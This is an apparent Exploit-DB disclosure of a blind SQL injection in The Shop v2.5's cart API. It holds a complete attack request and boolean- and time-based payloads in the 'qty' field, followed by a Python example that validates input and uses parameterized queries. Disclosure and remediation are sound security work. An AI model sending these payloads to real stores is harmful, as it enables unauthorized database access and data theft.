The Shop v2.5 – SQL Injection

  • Author: Ahmet Ümit BAYRAM
    Date: 2023-06-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51525/
  • # Exploit Title: The Shop v2.5 - SQL Injection
    # Date: 2023-06-17
    # Exploit Author: Ahmet Ümit BAYRAM
    # Vendor: https://codecanyon.net/item/the-shop/34858541
    # Demo Site: https://shop.activeitzone.com
    # Tested on: Kali Linux
    # CVE: N/A
    
    
    ### Request ###
    
    POST /api/v1/carts/add HTTP/1.1
    Content-Type: application/json
    Accept: application/json, text/plain, */*
    x-requested-with: XMLHttpRequest
    x-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4
    Referer: https://localhost
    Cookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL; the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7
    Content-Length: 81
    Accept-Encoding: gzip,deflate,br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
    Host: localhost
    Connection: Keep-alive
    
    {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}
    
    
    ### Parameter & Payloads ###
    
    Parameter: JSON qty ((custom) POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420) THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495) END))","temp_user_id":null}
    
    Type: time-based blind
    Title: MySQL > 5.0.12 OR time-based blind (heavy query)
    Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR 2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)","temp_user_id":null}
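    The root cause above is that the JSON `qty` value reaches the database as SQL text. The following is an added defender-side example, not code from the advisory or from The Shop: it shows the input check and parameterized write a fixed `carts/add` handler would apply, using the two payloads above as constructed rejected inputs. The table name `carts` and the SQLite backend are assumptions for the demonstration.

```python
import json
import re
import sqlite3

# Constructed sample bodies: one legitimate cart add, plus the two payloads from the advisory.
LEGIT_BODY = '{"variation_id":"119","qty":"2","temp_user_id":null}'
TIME_BASED_BODY = '{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}'
HEAVY_QUERY_BODY = ('{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR '
                    '2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, '
                    'INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)","temp_user_id":null}')

_POSITIVE_INT = re.compile(r"[1-9][0-9]*")


def parse_cart_add(raw_body: str) -> dict:
    """Accept variation_id and qty only as positive integers; anything else raises ValueError."""
    body = json.loads(raw_body)
    parsed = {}
    for field in ("variation_id", "qty"):
        value = body.get(field)
        if value is None or isinstance(value, bool):
            raise ValueError(f"{field}: missing")
        text = str(value)
        # fullmatch rejects SQL fragments such as "sleep(6)" or "... OR 2614=(SELECT ...)".
        if not _POSITIVE_INT.fullmatch(text):
            raise ValueError(f"{field}: not a positive integer")
        parsed[field] = int(text)
    return parsed


def rejects(raw_body: str) -> bool:
    """True when the body fails validation (what the handler should do before any DB call)."""
    try:
        parse_cart_add(raw_body)
    except ValueError:
        return True
    return False


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")  # assumed table layout for the example
    conn.execute("CREATE TABLE carts(variation_id INTEGER PRIMARY KEY, qty INTEGER NOT NULL)")
    return conn


def add_to_cart(conn: sqlite3.Connection, raw_body: str) -> int:
    """Validate, then write with bound parameters; returns the line's new quantity."""
    fields = parse_cart_add(raw_body)
    conn.execute("INSERT INTO carts(variation_id, qty) VALUES (?, ?) "
                 "ON CONFLICT(variation_id) DO UPDATE SET qty = qty + excluded.qty",
                 (fields["variation_id"], fields["qty"]))
    row = conn.execute("SELECT qty FROM carts WHERE variation_id = ?", (fields["variation_id"],)).fetchone()
    return row[0]
```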